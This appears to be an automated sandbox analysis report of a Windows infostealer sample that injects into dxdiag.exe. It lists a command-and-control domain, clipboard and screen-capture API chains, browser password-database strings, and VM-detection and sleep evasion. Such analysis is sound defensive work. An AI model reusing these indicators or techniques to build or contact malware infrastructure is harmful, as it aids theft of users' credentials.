                Source: dxdiag.exe, 00000002.00000003.2226701499.000000000500E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: dxdiag.exe, 00000002.00000003.2209512428.000000000500C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2278524685.0000000002C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mutterunurse.click/
                Source: dxdiag.exe, 00000002.00000003.2240921118.0000000005022000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2251040585.0000000005021000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2239478696.0000000005022000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2238186286.0000000005021000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2237874580.000000000501C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mutterunurse.click/A
                Source: dxdiag.exe, 00000002.00000002.2289289481.0000000002BD5000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2288285003.0000000002BD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mutterunurse.click/L
                Source: dxdiag.exe, 00000002.00000003.2224525421.000000000501E000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2224841744.0000000005021000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2224436080.000000000501B000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2225377449.0000000005021000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2226346264.0000000005021000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2237874580.000000000501C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mutterunurse.click/Q
                Source: dxdiag.exe, 00000002.00000003.2288285003.0000000002BE2000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.2290032670.000000000501F000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2224525421.000000000501E000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2225444532.0000000005011000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2225236793.0000000005011000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2224841744.0000000005021000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2251013552.0000000002C5B000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2224436080.000000000501B000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2226701499.0000000005011000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2262164770.0000000002C5E000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.2289289481.0000000002BE2000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2262657600.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2225377449.0000000005021000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2226346264.0000000005021000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2224600032.000000000500E000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2238186286.0000000005021000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.2289531598.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2237874580.000000000501C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2209512428.000000000500C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mutterunurse.click/api
                Source: dxdiag.exe, 00000002.00000003.2262186574.000000000500F000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2237965926.000000000500F000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2261930463.000000000500C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2251040585.0000000005011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mutterunurse.click/api_
                Source: dxdiag.exe, 00000002.00000003.2224525421.000000000501E000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2224841744.0000000005021000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2224436080.000000000501B000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2225377449.0000000005021000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2226346264.0000000005021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mutterunurse.click/apie
                Source: dxdiag.exe, 00000002.00000003.2288285003.0000000002BE2000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.2289289481.0000000002BE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mutterunurse.click/apivR
                Source: dxdiag.exe, 00000002.00000003.2288285003.0000000002BE2000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.2289289481.0000000002BE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mutterunurse.click/b
                Source: dxdiag.exe, 00000002.00000003.2288285003.0000000002BE2000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.2289289481.0000000002BE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mutterunurse.click/j
                Source: dxdiag.exe, 00000002.00000003.2224600032.000000000500E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mutterunurse.click:443/api
                Source: dxdiag.exe, 00000002.00000003.2226410373.00000000052B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: dxdiag.exe, 00000002.00000003.2226410373.00000000052B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: dxdiag.exe, 00000002.00000003.2226701499.000000000500E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                Source: dxdiag.exe, 00000002.00000003.2226701499.000000000500E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                Source: dxdiag.exe, 00000002.00000003.2193810951.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193668660.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193589244.0000000004FCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: dxdiag.exe, 00000002.00000003.2193810951.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193668660.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193589244.0000000004FCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: dxdiag.exe, 00000002.00000003.2226410373.00000000052B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: dxdiag.exe, 00000002.00000003.2226410373.00000000052B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: dxdiag.exe, 00000002.00000003.2226410373.00000000052B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: dxdiag.exe, 00000002.00000003.2226410373.00000000052B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: dxdiag.exe, 00000002.00000003.2226410373.00000000052B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: dxdiag.exe, 00000002.00000003.2226410373.00000000052B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49720 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49753 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49770 version: TLS 1.2
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00431A30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00431A30
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00431A30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00431A30
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00431BB0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,2_2_00431BB0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0040A9602_2_0040A960
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004261702_2_00426170
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0040E2A92_2_0040E2A9
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00416B7E2_2_00416B7E
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00439B902_2_00439B90
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004233A02_2_004233A0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00436C402_2_00436C40
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0043DCF02_2_0043DCF0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004215F02_2_004215F0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0042C6D72_2_0042C6D7
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0043E6902_2_0043E690
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0042BFD32_2_0042BFD3
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00410FD62_2_00410FD6
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0042BFDA2_2_0042BFDA
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004087F02_2_004087F0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00436F902_2_00436F90
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004097B02_2_004097B0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00425F7D2_2_00425F7D
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004090702_2_00409070
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0043A0302_2_0043A030
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004038C02_2_004038C0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004380D92_2_004380D9
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0041D8E02_2_0041D8E0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0042D0852_2_0042D085
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004280B02_2_004280B0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0042297F2_2_0042297F
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0042A1002_2_0042A100
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004379002_2_00437900
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00416E972_2_00416E97
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004059102_2_00405910
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004259202_2_00425920
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004301D02_2_004301D0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004081F02_2_004081F0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004089902_2_00408990
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004171902_2_00417190
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00414A402_2_00414A40
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0041BA482_2_0041BA48
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0040CA542_2_0040CA54
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004042702_2_00404270
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004222702_2_00422270
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004062002_2_00406200
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00423A002_2_00423A00
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0043CAC02_2_0043CAC0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0043E2C02_2_0043E2C0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004292D02_2_004292D0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00415ADC2_2_00415ADC
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0042BA8D2_2_0042BA8D
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004192BA2_2_004192BA
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0040B3512_2_0040B351
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0041CB5A2_2_0041CB5A
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004093602_2_00409360
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0041C3602_2_0041C360
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00411B1B2_2_00411B1B
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0043533A2_2_0043533A
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0043CBD62_2_0043CBD6
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0043A3F02_2_0043A3F0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00404BA02_2_00404BA0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0040D44C2_2_0040D44C
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00434C4D2_2_00434C4D
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004074702_2_00407470
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00419C102_2_00419C10
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00418C1E2_2_00418C1E
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0041D4202_2_0041D420
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0041DC202_2_0041DC20
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004364302_2_00436430
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0043CCE02_2_0043CCE0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00422CF82_2_00422CF8
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00427C9D2_2_00427C9D
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0043CD602_2_0043CD60
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004165712_2_00416571
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00424D702_2_00424D70
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00423D302_2_00423D30
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0041DE402_2_0041DE40
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00423E4B2_2_00423E4B
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00405E602_2_00405E60
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004126702_2_00412670
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004256702_2_00425670
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0041AE002_2_0041AE00
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0043CE002_2_0043CE00
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00423E302_2_00423E30
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004156D02_2_004156D0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00415EE02_2_00415EE0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004266E72_2_004266E7
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004066902_2_00406690
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004366902_2_00436690
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00416E972_2_00416E97
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00402EA02_2_00402EA0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004376B02_2_004376B0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00426EBE2_2_00426EBE
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00428F5D2_2_00428F5D
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0042B7632_2_0042B763
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00425F7D2_2_00425F7D
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00414F082_2_00414F08
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004207172_2_00420717
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004187312_2_00418731
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0041EF302_2_0041EF30
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_004167A52_2_004167A5
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00418FAD2_2_00418FAD
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0043DFB02_2_0043DFB0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: String function: 00414A30 appears 76 times
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: String function: 00408000 appears 52 times
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@1/1
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00436F90 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_00436F90
                Source: tesr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\tesr.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: dxdiag.exe, 00000002.00000003.2194242907.0000000004F9B000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2213921120.0000000004F9C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193974033.0000000004FB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: tesr.exeVirustotal: Detection: 35%
                Source: tesr.exeReversingLabs: Detection: 28%
                Source: unknownProcess created: C:\Users\user\Desktop\tesr.exe "C:\Users\user\Desktop\tesr.exe"
                Source: C:\Users\user\Desktop\tesr.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
                Source: C:\Users\user\Desktop\tesr.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
                Source: C:\Users\user\Desktop\tesr.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\tesr.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: tesr.exeStatic PE information: Image base 0x140000000 > 0x60000000
                Source: tesr.exeStatic file information: File size 12735488 > 1048576
                Source: tesr.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xa2b800
                Source: tesr.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x12e800
                Source: tesr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                Source: tesr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: tesr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: tesr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: tesr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: tesr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: tesr.exeStatic PE information: section name: .fptable
                Source: tesr.exeStatic PE information: section name: _RDATA
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00446061 push edx; retf 2_2_00446062
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0043CA60 push eax; mov dword ptr [esp], 11102FFEh2_2_0043CA63
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00445A2E push esi; ret 2_2_00445A31
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00442543 push esp; retf 2_2_00442549
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00446EA4 push edi; iretd 2_2_00446EA5
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00439F70 push eax; mov dword ptr [esp], 60616263h2_2_00439F7F
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\SysWOW64\dxdiag.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exe TID: 6520Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exe TID: 6520Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
